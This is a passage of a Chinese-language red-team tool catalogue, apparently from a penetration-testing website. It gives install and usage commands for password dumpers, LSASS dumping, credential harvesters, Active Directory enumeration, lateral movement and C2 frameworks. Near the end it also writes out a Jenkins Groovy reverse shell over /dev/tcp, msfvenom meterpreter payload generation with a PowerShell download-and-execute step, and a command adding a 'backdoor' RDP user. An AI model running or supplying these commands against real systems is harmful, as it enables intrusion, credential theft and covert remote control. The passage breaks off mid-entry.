从浏览器、数据库、游戏、邮件、git、wifi 等中提取本地存储的密码的好工具。

安装:(二进制)

您可以从此处安装独立的二进制文件。

用法:

# Launch all modes
.laZagne.exe all # Launch only a specific module .laZagne.exe browsers

# Launch only a specific software script
.laZagne.exe browsers -firefox


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第67
张图片

hashcat

破解密码哈希的工具。支持大量哈希算法(完整列表可在此处找到)。

安装:二进制

您可以从此处安装独立的二进制文件。

用法:

.hashcat.exe --help

不错的 hashcat 命令备忘单


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第68
张图片

开膛手约翰(John the Ripper)

另一种密码破解器,支持数百种哈希和密码类型,可在许多操作系统、CPU 和 GPU 上运行。

安装:

sudo apt-get install john -y

用法:

john


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第69
张图片

SCOMDecrypt

此工具旨在检索和解密存储在 Microsoft System Center Operations Manager (SCOM) 数据库中的 RunAs 凭据。

NCC 博客文章 – ‘SCOMplicated? – 解密 SCOM“RunAs”凭证

先决条件:

要运行该工具,您将需要 SCOM 服务器的管理权限。您还需要确保您具有对以下注册表项的读取权限:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftSystem Center2010CommonMOMBins

您可以通过从以下键收集连接详细信息来手动检查您是否可以看到数据库:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftSystem Center2010CommonDatabaseDatabaseServerName
HKEY_LOCAL_MACHINESOFTWAREMicrosoftSystem Center2010CommonDatabaseDatabaseName

安装:(PS1)

git clone https://github.com/nccgroup/SCOMDecrypt cd .SCOMDecryptSCOMDecrypt
. .Invoke-SCOMDecrypt.ps1

安装:(编译)

使用Visual Studio 2019 Community Edition,您可以编译 SCOMDecrypt 二进制文件。

打开 SCOMDecrypt项目 .sln,选择“发布”,然后构建。

用法:

# PS1 Invoke-SCOMDecrypt  # Compiled C# binary .SCOMDecrypt.exe


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第70
张图片

图片文字使用自https://github.com/nccgroup/SCOMDecrypt

nanodump

LSASS(Local Security Authority Subsystem Service)是 Windows 操作系统中的一个系统进程,负责在系统上执行安全策略。它负责许多与安全相关的任务,包括验证用户登录、执行安全策略和生成审计日志。

创建此进程的转储可以让攻击者从进程的内存中提取密码哈希或其他敏感信息,这些信息可用于进一步破坏系统。

这允许创建 LSASS 进程的小型转储。

安装:

git clone https://github.com/helpsystems/nanodump.git

安装:(带有 MinGW 的 Linux)

make -f Makefile.mingw

安装:(带有 MSVC 的 Windows)

nmake -f Makefile.msvc

安装:(仅限 CobaltStrike)

NanoDump.cna在 Cobalt Strike 上导入脚本。

完整的安装信息可以在这里找到。

用法:

# Run nanodump.x64.exe # Leverage the Silent Process Exit technique nanodump --silent-process-exit C:WindowsTemp # Leverage the Shtinkering technique nanodump --shtinkering

完整的使用信息可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第71
张图片

图片来自https://github.com/helpsystems/nanodump

eviltree

经典“树”命令的独立 python3 翻版,具有在文件中搜索用户提供的关键字/正则表达式的附加功能,突出显示包含匹配项的内容。创建的主要原因有两个:

  • 在嵌套目录结构的文件中搜索秘密时,能够可视化哪些文件包含用户提供的关键字/正则表达式模式以及这些文件在文件夹层次结构中的位置,提供了一个显着的优势。
  • tree是分析目录结构的神奇工具。拥有用于后开发枚举的命令的独立替代方案真的很方便,因为它并未预安装在每个 linux 发行版上,并且在 Windows 上有点受限(与 UNIX 版本相比)。

安装:

git clone https://github.com/t3l3machus/eviltree

用法:

# Running a regex that essentially matches strings similar to: password = something against /var/www python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v # Using comma separated keywords instead of regex python3 eviltree.py -r C:UsersUSERNAME -k passw,admin,account,login,user -L 3 -v


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第72
张图片

图片来自https://github.com/t3l3machus/eviltree

SeeYouCM-Thief

用于从搜索 SSH 凭据的 Cisco 电话系统自动下载和解析配置文件的简单工具。

还将有选择地从 UDS API 枚举活动目录用户。

博客 – 利用思科电话系统中的常见错误配置

安装:

git clone https://github.com/trustedsec/SeeYouCM-Thief
python3 -m pip install -r requirements.txt

用法:

# Enumerate Active Directory users from the UDS api on the CUCM ./thief.py -H--userenum # Without specifying a phone IP address the script will attempt to download every config in the listing. ./thief.py -H[--verbose] # Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet. ./thief.py --phone[--verbose] # Specify a subnet to scan with reverse lookups. ./thief.py --subnet[--verbose]


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第73
张图片

图片来自https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/

MailSniper

MailSniper 是一种渗透测试工具,用于在 Microsoft Exchange 环境中通过电子邮件搜索特定术语(密码、内部情报、网络架构信息等)。它可以用作非管理用户来搜索他们自己的电子邮件,或者由 Exchange 管理员用来搜索域中每个用户的邮箱。

MailSniper 还包括用于密码喷射、枚举用户和域、从 OWA 和 EWS 收集全球地址列表 (GAL) 以及检查组织中每个 Exchange 用户的邮箱权限的附加模块。

不错的博客文章,其中包含有关 此处的更多信息。

MailSniper 野战手册

安装:

git clone https://github.com/dafthack/MailSniper cd MailSniper
Import-Module MailSniper.ps1

用法:

# Search current users mailbox
Invoke-SelfSearch -Mailbox current-user@domain.com


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第74
张图片

图片来自https://patrowl.io/

SharpChromium

SharpChromium 是一个 .NET 4.0+ CLR 项目,用于从 Google Chrome、Microsoft Edge 和 Microsoft Edge Beta 检索数据。目前,它可以提取:

  • Cookies(JSON 格式)
  • 历史记录(每个历史记录项都有关联的 cookie)
  • 保存的登录

与以前的实现相比,这种重写有几个优点,其中包括:

  • 无需类型编译或反射
  • Cookie 以 JSON 格式显示,便于导入 Cookie 编辑器。
  • 无需从远程资源下载 SQLite 程序集。
  • 支持主要的 Chromium 浏览器(但可扩展到其他浏览器)

安装:

使用Visual Studio 社区版

打开项目 .sln,选择“发布”,然后构建。

用法:

# Retrieve cookies associated with Google Docs and Github .SharpChromium.exe cookies docs.google.com github.com # Retrieve history items and their associated cookies. .SharpChromium.exe history # Retrieve saved logins (Note: Only displays those with non-empty passwords): .SharpChromium.exe logins


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第75
张图片

图片来自https://github.com/djhohnstein/SharpChromium

dploot

DPAPI(数据保护应用程序编程接口)提供一组 API 来加密和解密数据,其中用户密码通常用于设置“主密钥”(在用户场景中)。因此,要利用 DPAPI 访问某些数据(Chrome Cookies/登录数据、Windows 凭据管理器/Vault 等),我们只需要访问密码即可。

dploot 是 SharpDPAPI 的 Python 重写,由 Harmj0y 用 C# 编写,它本身是 gentilkiwi 从 Mimikatz 移植的 DPAPI。它实现了这些工具的所有 DPAPI 逻辑,但这次它可用于 Python 解释器和 Linux 环境。

博客 – 针对攻击性用户 DPAPI 滥用的操作指南

安装:(Pip

pip install dploot

安装:(Git)

git clone https://github.com/zblurx/dploot.git cd dploot
make

用法:

# Loot decrypted machine private key files as a Windows local administrator 
dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet # Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)
dploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet # Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints
dploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk  -quiet 

发现

PCredz

此工具从一个文件中提取信用卡号、NTLM(DCE-RPC、HTTP、SQL、LDAP 等)、Kerberos(AS-REQ Pre-Auth etype 23)、HTTP Basic、SNMP、POP、SMTP、FTP、IMAP 等pcap 文件或来自实时界面。

安装:

git clone https://github.com/lgandx/PCredz

用法:(PCAP文件夹)

python3 ./Pcredz -d /tmp/pcap-directory-to-parse/

用法:(实时捕获)

python3 ./Pcredz -i eth0 -v


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第76
张图片

PingCastle

Ping Castle 是一种旨在使用基于风险评估和成熟度框架的方法快速评估 Active Directory 安全级别的工具。它的目标不是完美的评估,而是效率的妥协。

安装:(下载)

https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip

用法:

./PingCastle.exe


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第77
张图片

Seatbelt

Seatbelt 是一个有用的工具,用于收集有关目标 Windows 机器安全状况的详细信息,以便识别潜在的漏洞和攻击向量。

它旨在在受感染的受害计算机上运行,以收集有关当前安全配置的信息,包括有关已安装软件、服务、组策略和其他安全相关设置的信息

安装:(编译)

Seatbelt 是针对具有 C# 8.0 功能的 .NET 3.5 和 4.0 构建的,并且与Visual Studio Community Edition兼容。

打开项目 .sln,选择“发布”,然后构建。

用法:

# Run all checks and output to output.txt
Seatbelt.exe -group=all -full > output.txt

# Return 4624 logon events for the last 30 days
Seatbelt.exe "LogonEvents 30"

# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.* Seatbelt.exe "reg "HKLMSOFTWAREMicrosoftWindows Defender" 3 .*defini.* true"

# Run remote-focused checks against a remote system Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIREsam -password="yum "po-ta-toes""

完整的命令组和参数可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第78
张图片

图片来自https://exord66.github.io/csharp-in-memory-assemblies

ADRecon

收集有关受害者的 Microsoft Active Directory (AD) 环境信息的好工具,支持 Excel 输出。

它可以从连接到环境的任何工作站运行,甚至是非域成员的主机。

BlackHat USA 2018 SlideDeck

先决条件

  • .NET Framework 3.0 或更高版本(Windows 7 包括 3.0)
  • PowerShell 2.0 或更高版本(Windows 7 包括 2.0)

安装:(Git)

git clone https://github.com/sense-of-security/ADRecon.git

安装:(下载)

您可以下载最新版本的 zip 存档。

用法:

# To run ADRecon on a domain member host.
PS C:> .ADRecon.ps1

# To run ADRecon on a domain member host as a different user.
PS C:>.ADRecon.ps1 -DomainController or FQDN> -Credential 

# To run ADRecon on a non-member host using LDAP.
PS C:>.ADRecon.ps1 -Protocol LDAP -DomainController or FQDN> -Credential 

# To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)
PS C:>.ADRecon.ps1 -Protocol ADWS -DomainController or FQDN> -Credential  -Collect Domain, DomainControllers

完整的用法和参数信息可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第79
张图片

图片来自https://vk9-sec.com/domain-enumeration-powerview-adrecon/

adidnsdump

默认情况下,Active Directory 中的任何用户都可以枚举域或林 DNS 区域中的所有 DNS 记录,类似于区域传输。

此工具启用区域中所有 DNS 记录的枚举和导出,用于内部网络的侦察目的。

安装:(pip

pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump

安装:(Git)

git clone https://github.com/dirkjanm/adidnsdump cd adidnsdump
pip install .

注意: 该工具需要impacket和dnspython才能运行。虽然该工具适用于 Python 2 和 3,但 Python 3 支持需要您从 GitHub 安装 impacket

用法:

# Display the zones in the domain where you are currently in adidnsdump -u icorptestuser --print-zones icorp-dc.internal.corp # Display all zones in the domain adidnsdump -u icorptestuser icorp-dc.internal.corp # Resolve all unknown records (-r) adidnsdump -u icorptestuser icorp-dc.internal.corp -r

博客 – 进入区域:使用 adidnsdump 转储 Active Directory DNS


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第80
张图片

图片来自https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/

kerbrute

一种通过 Kerberos 预身份验证快速暴力破解和枚举有效 Active Directory 帐户的工具。

安装:(go)

go get github.com/ropnop/kerbrute

安装:(Make

git clone https://github.com/ropnop/kerbrute cd kerbrute
make all

用法:

# User Enumeration ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt # Password Spray ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 # Brute User ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman # Brute Force ./kerbrute -d lab.ropnop.com bruteforce -


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第81
张图片

图片来自
matthewomccorkle.github.io/day_032_kerbrute/

Scavenger

Scavenger 是一种用于清理系统的多线程开发后扫描工具,可查找最常用的文件和文件夹以及包含敏感信息的“有趣”文件。

Scavenger 面临渗透测试顾问在内部渗透测试期间通常面临的具有挑战性的问题;在有限的测试时间内访问太多系统的问题。

安装:

首先从这里安装 CrackMapExec 。

git clone https://github.com/SpiderLabs/scavenger cd scavenger

用法:

# Search for interesting files on victim endpoint python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local

不错的博文


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第82
张图片

图片来自https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/

横向运动

crackmapexec

这是使用凭据对(用户名:密码,用户名:哈希)在 Windows/Active Directory 环境中进行旋转的好工具。它还提供了其他功能,包括枚举登录用户和爬取 SMB 共享以执行 psexec 式攻击、使用 Powershell 将 Mimikatz/Shellcode/DLL 自动注入内存、转储 NTDS.dit 等。

安装:

sudo apt install crackmapexec

用法:

crackmapexec smb <ip address> -d <domain> -u <user list> -p <password list>


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第83
张图片

WMIOps

WMIOps 是一个 powershell 脚本,它使用 WMI 在 Windows 环境中对本地或远程主机执行各种操作。

由@christruncer开发。

原始博客文章记录发布。

安装:(PowerShell)

git clone https://github.com/FortyNorthSecurity/WMIOps
Import-Module WMIOps.ps1

用法:

# Executes a user specified command on the target machine Invoke-ExecCommandWMI # Returns all running processes from the target machine Get-RunningProcessesWMI # Checks if a user is active at the desktop on the target machine (or if away from their machine) Find-ActiveUsersWMI # Lists all local and network connected drives on target system Get-SystemDrivesWMI # Executes a powershell script in memory on the target host via WMI and returns the output Invoke-RemoteScriptWithOutput


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第84
张图片
RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第85
张图片

图片使用自https://pentestlab.blog/2017/11/20/command-and-control-wmi/

PowerLessShell

使用 MSBuild.exe 远程执行 PowerShell 脚本和命令而无需生成 powershell.exe 的工具。

安装:

git clone https://github.com/Mr-Un1k0d3r/PowerLessShell cd PowerLessShell

用法:

# Help python PowerLessShell.py -h # Generate PowerShell payload  python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj # Generating a shellcode payload python PowerLessShell.py -source shellcode.raw -output malicious.csproj

完整的使用信息可以在这里找到


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第86
张图片

图片来自https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628

PsExec

PsExec 是 Sysinternals 工具套件的一部分,它是一组用于管理和排除 Windows 系统故障的实用程序。

它非常适合在目标机器上远程执行命令。

注意:一些 AV 将 PsExec 检测为“远程管理员”病毒。

安装:(PowerShell)

Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip' Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMPpstools" Move-Item -Path "$env:TEMPpstoolspsexec.exe" .
Remove-Item -Path "$env:TEMPpstools" -Recurse

用法:

# Prevent the license agreement from being displayed psexec.exe /accepteula # Run the 'hostname' command on remote machine psexec.exe REMOTECOMPUTER hostname # Run the 'hostname' command on EVERYTHING (on the domain) psexec.exe * hostname # Run a local executable on a remote machine psexec.exe REMOTECOMPUTER -c C:Toolsprogram.exe # Run the 'hostname' command with different credentials psexec.exe REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word # Spawn shell on remote machine psexec.exe -s REMOTECOMPUTER cmd

关于 PsExec 用法的精彩博文


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第87
张图片

图片来自https://adamtheautomator.com/psexec/

LiquidSnake

Liquid Snake 是一个旨在在不接触磁盘的情况下针对 Windows 系统执行横向移动的程序。

该工具依赖于 WMI 事件订阅来在内存中执行 .NET 程序集,.NET 程序集将在命名管道上侦听 shellcode,然后使用线程劫持 shellcode 注入的变体执行它。

该项目由两个独立的解决方案组成:

  • CSharpNamedPipeLoader– 将通过 GadgetToJScript 在 VBS 中转换的组件
  • LiquidSnake– 负责在远程系统上创建 WMI 事件订阅的组件

安装:

在 Visual Studio 中打开这两个解决方案并构建。确保将CSharpNamedPipeLoader.

输出:两个独立的 EXE:CSharpNamedPipeLoader.exe和LiquidSnake.exe

可以在此处找到完整的构建信息。

用法:

再次使用LiquidSnake.exe您具有管理访问权限的主机,如下所示:

LiquidSnake.exe <host> [<username> <password> <domain>]
LiquidSnake.exe dc01.isengard.local
LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local

如果一切顺利,您应该获得类似于以下内容的输出:

[*] Event filter created. [*] Event consumer created. [*] Subscription created, now sleeping [*] Sending some DCOM love.. [*] Sleeping again... long day

一般使用信息可以在这里找到。

完整的使用信息可以在这里LiquidSnake找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第88
张图片

图片来自
github.com/RiccardoAncarani/LiquidSnake#usage

开启RDP

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net localgroup "Remote Desktop Users" "backdoor" /add

将 shell 升级为 meterpreter

外壳 ( https://infinitelogins.com/tag/payloads/ )

在获得对端点的基本 shell 访问权限后,可以更好地继续使用 meterpreter。

[攻击者]生成一个 meterpreter shell:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
msfvenom -p linux/x86/shell/reverse_tcp LHOST=LPORT=-f elf > shell-x86.elf


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第89
张图片

[受害者]下载到受害者端点:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://:8000/shell-name.exe','shell-name.exe')"`

[攻击者]配置监听器:

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run`

[受害者]执行载荷:

Start-Process "shell-name.exe"`


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第90
张图片

端口转发

有时,在获得对端点的访问权限后,会有本地端口。使这些内部端口可外部路由有助于横向移动到主机上的其他服务。

socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT &

jenkins 反向shell

如果您获得了对 jenkins 脚本控制台的访问权限,则可以使用它在节点上获得反向 shell。

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

ADFSpoof

由 Doug Bienstock @doughsec在 Mandiant FireEye 时创建。

ADFSpoof 有两个主要功能:

  1. 给定来自 AD FS 配置数据库的 EncryptedPFX blob 和来自 Active Directory 的 DKM 解密密钥,生成一个可用的密钥/证书对用于令牌签名。
  2. 给定签名密钥,生成可用于访问联合应用程序的签名安全令牌。

此工具旨在与 ADFSDump 结合使用。ADFSDump 在 AD FS 服务器上运行并输出您需要使用 ADFSpoof 的重要信息。

安装:

注意: ADFSpoof 需要安装 Python 加密包的自定义分支,可在此处获取。

git clone https://github.com/mandiant/ADFSpoof
pip install -r requirements.txt

用法:

# Decrypt the EncryptedPFX and write to disk python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump # Generate a security token for Office365 python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759

完整的使用信息可以在这里找到。

可以在此处找到其他命令示例。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第91
张图片

图片来自https://github.com/mandiant/ADFSpoof#usage

Coercer

一个 python 脚本,通过多种方法自动强制 Windows 服务器在任意机器上进行身份验证。

特征:

  • 列出远程机器上打开的 SMB 管道(在扫描认证和模糊认证模式下)
  • 尝试连接到远程计算机上的已知 SMB 管道列表(在模式扫描未经身份验证和模糊未经身份验证)
  • 逐个调用所有易受攻击的 RPC 函数,以强制服务器在任意机器上进行身份验证。
  • 随机 UNC 路径生成以避免缓存失败尝试(所有模式)
  • 使用 –delay 尝试之间的可配置延迟

更多功能信息,请点击此处

安装:(pip)

sudo python3 -m pip install coercer

用法:

# Scan mode (Assess the Remote Procedure Calls listening on a machine) ./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder) ./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Fuzz mode (Fuzz Remote Procedure Calls listening on a machine) ./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第92
张图片

图片来自https://github.com/p0dalirius/Coercer#quick-start

收集

BloodHound

用于可视化活动目录环境的应用程序。一种可视化攻击路径和了解受害者活动目录属性的快速方法。

安装: PenTestPartners 演练

自定义查询: CompassSecurity BloodHoundQueries


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第93
张图片

Snaffler

Snaffler 是用于 Active Directory 环境的高级凭据扫描器/收集器。有一个很棒的README

Snaffler 使用“分类器”系统,每个分类器检查共享或文件夹或文件或文件内容,将一些项目向下传递到下一个分类器,并丢弃其他项目。每个分类器使用一组规则来决定如何处理它分类的项目。

有关 Snaffler规则的更多信息。

从广义上讲 – 它从 Active Directory 获取 Windows 计算机列表,然后将它的 snaffly 附件展开到所有这些计算机以确定哪些计算机具有文件共享,以及您是否可以读取它们。‘ – Snaffler 自述文件 (2023)

安装:

您可以从GitHub 发布页面下载二进制文件。

用法:

# Targeted local scan (less likely to trigger detections) Snaffler.exe -s -i C: # Go in loud and find everything snaffler.exe -s -o snaffler.log


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第94
张图片

图片来自https://github.com/SnaffCon/Snaffler#what-does-it-look-like

linWinPwn

linWinPwn 是一个 bash 脚本,可以自动执行许多 Active Directory 枚举和漏洞检查。

该脚本使用了许多工具并作为它们的包装器。工具包括:impacket、bloodhound、crackmapexec、enum4linux-ng、ldapdomaindump、lsassy、smbmap、kerbrute、adidnsdump、certipy、silenthound 等。

当您只能在有限的时间内访问 Active Directory 环境,并且您希望自动执行枚举过程并有效地收集证据时,linWinPwn 特别有用。

安装:

git clone https://github.com/lefayjey/linWinPwn cd linWinPwn; chmod +x linWinPwn.sh chmod +x install.sh
./install.sh

用法:

# Default: interactive - Open interactive menu to run checks separately ./linWinPwn.sh -t[-d-u-p  -o] # Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules ./linWinPwn.sh -t--auto-config # LDAPS - Use LDAPS instead of LDAP (port 636) ./linWinPwn.sh -t--ldaps # Module pwd_dump: Password Dump ./linWinPwn.sh -t-M pwd_dump [-d-u-p  -o]

完整的使用信息在这里


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第95
张图片

图片来自https://github.com/lefayjey/linWinPwn#demos

命令与控制(C2)

Living Off Trusted Sites Project

C2 植入可以被防御者检测到,防御者寻找不寻常的网络流量到不常见的域。此外,代理解决方案有时会阻止与不受信任域的连接。

能够通过受信任的域隐藏您的 C2 流量将帮助您保持不被发现并降低在代理级别被安全解决方案阻止的可能性。

此资源包含可以使用的受信任站点列表。

用法:

访问https://lots-project.com/

在搜索栏中搜索+C&C以查看可用于命令和控制操作的所有潜在域/子域。

结果包括:

  • raw.githubusercontent.com
  • docs.google.com
  • *.azurewebsites.net
  • dropbox.com 网站
  • *.amazonaws.com


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第96
张图片

图片来自https://lots-project.com/

Havoc

Havoc 是由@C5pider创建的现代且可延展的后开发命令和控制框架。

功能包括:睡眠混淆、x64 返回地址欺骗、Nt* API 的间接系统调用

先决条件:(Ubuntu 20.04 / 22.04)

sudo apt install build-essential
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update sudo apt install python3.10 python3.10-dev

构建+用法:

git clone https://github.com/HavocFramework/Havoc.git cd Havoc/Client
make 
./Havoc 

先决条件:(Ubuntu 20.04 / 22.04)

cd Havoc/Teamserver
go mod download golang.org/x/sys  
go mod download github.com/ugorji/go

构建+用法:

cd Teamserver
./Install.sh
make
./teamserver -h

运行团队服务器

sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug

wiki上的完整安装、构建和运行说明


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第97
张图片

Covenant

Covenant 是一个 .NET 命令和控制框架,它有一个允许多用户协作的 Web 界面。

它可用于远程控制受感染的系统并执行各种不同的任务,包括执行任意代码、捕获击键、泄露数据等。

安装:(Dotnet Core

您可以从此处为您的平台下载 dotnet 核心。

注意: 启动Covenant后,必须通过web界面注册一个初始用户。导航到 Web 界面将允许您注册初始用户

git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant

用法:(Dotnet Core

~/Covenant/Covenant > dotnet run
warn: Microsoft.EntityFrameworkCore.Model.Validation[10400]
      Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.
WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.
Covenant has started! Navigate to https://127.0.0.1:7443 in a browser

安装:(Docker

# Build the docker image: git clone --recurse-submodules https://github.com/cobbr/Covenant cd Covenant/Covenant
~/Covenant/Covenant > docker build -t covenant .

用法:(Docker

# Run Covenant within the Docker container ~/Covenant/Covenant > docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant # Stop the container ~/Covenant/Covenant > docker stop covenant # Restart Covenant interactively ~/Covenant/Covenant > docker start covenant -ai

可以在此处的wiki 上找到完整的安装和启动说明。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第98
张图片

图片来自https://github.com/cobbr/Covenant

Merlin

Merlin 是一个开源的后渗透框架,旨在在系统初始受损后使用。

它是用 Python 编写的,可用于执行各种不同的任务,例如执行任意代码、在网络中横向移动以及泄露数据。

安装:

  1. 从发布部分下载最新编译版本的 Merlin Server
  2. 使用 x 函数解压 7zip 文件 密码是:merlin
  3. 启动Merlin
  4. 配置监听器
  5. 部署代理。有关示例,请参阅代理执行快速入门指南
mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z
sudo ./merlinServer-Linux-x64

用法:

  1. 确保 Merlin 服务器正在使用配置的侦听器运行
  2. 为受害者下载并部署代理
  3. 执行代理

有关详细的使用信息,请参阅官方 Merlin wiki


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第99
张图片

图片来自https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks

Metasploit

Metasploit 是一个用于开发、测试和使用漏洞利用代码的开源框架。

Metasploit 框架包括大量预构建的漏洞利用和有效负载,以及用于创建和测试自定义漏洞利用的功能齐全的集成开发环境 (IDE)。

安装:(安装程序)

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&  chmod 755 msfinstall && 
  ./msfinstall

用法:

/opt/metasploit-framework/bin/msfconsole

可以在官方wiki上找到完整的安装说明。

Rapid7 Metasploit 博客

备忘单

不错的命令列表


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第100
张图片

图片来自https://goacademy.io/how-to-install-metasploit-on-kali-linux/

Pupy

Pupy 是一个用 Python 和 C 编写的开源、跨平台(Windows、Linux、OSX、Android)C2 和后期开发框架。

它允许攻击者远程控制受害者的计算机并执行各种操作,例如命令执行、按键记录和截屏。

安装:(Git)

